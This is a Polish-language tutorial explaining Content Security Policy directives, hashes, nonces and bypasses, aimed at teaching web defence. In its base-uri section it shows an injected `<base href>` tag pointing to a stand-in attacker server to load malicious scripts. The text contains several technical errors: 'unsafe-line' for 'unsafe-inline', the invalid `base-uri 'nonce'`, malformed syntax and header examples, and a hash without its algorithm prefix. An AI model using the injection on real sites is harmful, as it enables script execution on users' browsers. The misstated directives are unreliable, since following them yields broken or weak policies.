# Content Security Policy

## CSP - co to jest i do czego służy?
Content Security Policy jest nowoczesnym mechanizmem mającym na celu ochronę aplikacji przed atakami typu XSS, Clickjacking i innymi. Chociaż głównie skupia się na XSS. 
Najczęściej CSP spotyka się w formie dodatkowego nagłówka HTTP, w którym zdefiniowane są różne dyrektywy mające na celu zadbać o bezpieczeństwo. Mnogość różnych dyrektyw oraz plików chociażby js jest główną przyczyną błędnej implementacji, która pozwala na wykonanie ataku XSS.

## CSP - Budowa
Tak jak w przypadku innych nagłówków, CSP składa się z wartości nazwy nagłówka.
```sh
Content-Security-Policy: dyrektywy
```
Przy czym należy pamiętać, żeby dążyć do jak najmniejszej liczby dyrektyw, bo zbyt pogmatwane dyrektywy mogą być przyczyną błędów bezpieczeństwa pozwalających na wykonanie kodu, pomimo zdefiniowania polityki zawartości.

## CSP - Dyrektywa default-src
Na sam początek pokażę użycie najbardziej podstawowej dyrektywy w CSP czyli default-src
```sh
Content-Security-Policy: default-src https://example.com
```
Ta dyrektywa jest bardzo prosta i ogranicza odwołanie się do innych domen oprócz example.com. Jeżeli atakujący będzie chciał ominąć taką dyrektywę to jedynym sposobem na ominięcie tego zabezpieczenia jest znalezienie podatności w domenie example.com. Pomimo to błędy nawet przy takim ustawieniu zdarzają się bardzo często, np. w plikach używanych przez wiele stron jak bibliotek jQuery.
Warto też zaznaczyć, że nie da się wykonać skryptu bezpośrednio na podanej stronie. Dyrektywa default-src umożliwia wykonanie skryptów tylko z zewnętrznych plików załadowanych ze zdefiniowanej domeny.

## CSP - składnia
Dyrektywy csp są między sobą oddzielone spacjami, a słowa kluczowe dyrektyw znajdują się między znakami "''". Dodatkowo każda dyrektywa oprócz pierwszej kończy się średnikiem:
```sh
Content-Security-Policy: default-src 'self' default-src 'none'; default-src 'none'
```
Oprócz tego istnieją pewne zasady notacji.
Jeżeli w nazwie domeny nie uwzględni się protokołu to skrypty będą mogły być ładowane z dowolnego protokołu tej domeny.
Jeśli zostanie zdefiniowany tylko protokół bez domeny to każdy skrypt korzystający z danego protokołu będzie działał.
Jeżeli chcielibyśmy, żeby skrypty działały też z poddomen wystarczy użyć znaku `*`
```sh
Content-Security-Policy: https://*.example.com
```
Jeżeli zostanie zdefiniowana ścieżka pod daną domeną. To tylko z tej ścieżki będą mogły być ładowane skrypty.
Zdefiniowanie ścieżki do pliku umożliwia dostęp do js tylko w obrębie tego jednego pliku.
```sh
default-src 'self'
``` 
oznacza, że pliki będą ładowane tylko z tej strony na której jest podana dyrektywa.
Dyrektywa ze słowem kluczowym 'none' uniemożliwia ładowanie plików z zewnętrznych serwerów.

## Content Security Policy - Dyrektywa script-src
Tytułowa dyrektywa jest przeznaczona do dokładniejszego definiowania skąd i jakie skrypty mogą być ładowane na stronie.
W swojej klasycznej opcji dyrektywa 'self' pozwala na ładowanie plików tylko z domeny na której się znajduje. Dodatkowo, nie pozwala na wykonywanie się plików nawet w kontekście domeny na której jest zdefiniowana.
Takie użycie CSP mija się z celem dlatego wprowadzono dużo luźniejsze słowo kluczowe 'unsafe-line', które pozwala na wykonywanie kodu w obrębie domeny, ale niestety też pozwala na wykonanie złośliwego wstrzykniętego kodu. W celu naprawy tego problemu wprowadzono mechanizm hashy. Polega on na obliczeniu hasha SHA-256, SHA-384 lub SHA-512 z treści skryptu następnie zakodowaniu w Base64. Taki hash można następnie włączyć w poniższy sposób:
```sh
Content-Security-Policy: script-src 'jakishash'
```
Co całkowicie niweluje efekt XSS ze względu na to, że nawet najmniejsza zmiana kodu np. dodatkowy biały znak taki jak spacja zmieniłby cały hash. Minusem tego rozwiązania jest to, że przy dużej ilości plików rozwiązanie z liczeniem hashu dla każdego z nich jest niewydajne, a nagłówek CSP zawierałby ogromną ilość danych. Dodatkowo przy każdej zmianie pliku trzeba byłoby liczyć hash na nowo. W takim wypadku jest i drugie rozwiązanie czyli słowo kluczowe nonce-wartość. Za każdym razem kiedy strona jest ładowana wartość nonce zmienia się zupełnie jak token CSRF i jest wymagana w plikach JS w celu umożliwienia im działania. Jeżeli atakujący nie jest w stanie wydobyć wartości z serwera przy użyciu innej luki jego skrypt nie zadziała.

## Content Security Policy - Dyrektywa base-uri
Dyrektywa base-uri może posłużyć do ominięcia słowa kluczowego nonce. Sztuczka polega na tym, że wstrzykniecie do kodu:
```html
<base href="https://attacker-server.com">
```
spowoduje, że odtąd wszystkie pliki ze ścieżką względną będą ładowane z serwera atakującego.
Dla przykładu, jeżeli strona ładuje plik app.js i atakujący wstrzyknie w base swój adres serwera będzie mógł zdefiniować plik app.js ze złośliwym kodem, który załaduje się z serwera atakującego i wykona na stronie. Ogromnym problem jest to, że omiaja to też wartość nonce, która jest i tak przez serwer prawidłowo generowana i dołączana do skryptu. Dlatego najczęściej korzysta się z opcji
```sh
base-uri 'nonce'
```
która nie zezwala na używanie innych domen.

## Dyrektywa form-action
Inną groźną dyrektywą jest form-action, która niewłaściwie ustawiona może pozwolić na wykonanie kodu przekierowując formularz na serwer atakującego. Wykorzystywany jest tutaj mechanizm parsowania formularzy. Jeżeli dwa tagi formularza pojawią sie pod rząd to, zostanie wykonany ten pierwszy.

## CSP - inne dyrektywy
CSP posiada wiele innych dyrektyw, które można wykorzystać w różnych przypadkach. Szczególnie warto zwrócić uwagę na:
```sh
frame-ancestors
report-uri
plugin-types
sandbox
```

## Sposoby obejścia CSP
Nieco wyżej wymieniłem jedne ze sposobów obchodzenia CSP przy źle zaimplementowanych dyrektywach. Teraz postaram się pokazać kolejny sposób na ominięcie CSP.

### Ćwiczenie: Omijanie Content Security Policy korzystając z wtyczki CSP Evaluation
Wtyczka CSP Evaluation pozwala na sprawdzenie poprawności dyrektyw CSP oraz wykorzystywanych zewnętrznych plików. Często jest tak, że to zewnętrzne pliki jakiegoś frameworka są źródłem błędów bezpieczeństwa ze względu na to, że ogromna masa mechanizmów daje dużo potencjalnych możliwości ominięcia z pozoru restrykcyjnej polityki CSP.
```sh
https://chrome.google.com/webstore/detail/csp-evaluator/fjohamlofnakbnbfjkohkbdigoodcejf?hl=en
```
Wtyczka dla każdej strony sprawdzi jakość implementacji CSP i jeżeli znajdzie coś interesującego zaznaczy to na czerwono. W ramach zadania polecam wejść na kilka stron z tą wtyczką, żeby przekonać się jak wiele stron ma problemy z właściwą implementacją CSP.

## Dobre praktyki CSP
Do głównych praktyk implementacyjnych CSP należą:
- Sprawdzanie każdego pliku z osobna
- Uproszczenie reguł
- Sprawdzenie możliwości wdrożenia bez niebezpiecznych słów kluczowych jak 'unsafe-line'
- Skorzystanie z CSP Evaluation w celu sprawdzenia poprawności polityki
- Korzystanie z base-uri 'nonce'
- Korzystanie z nonce-hash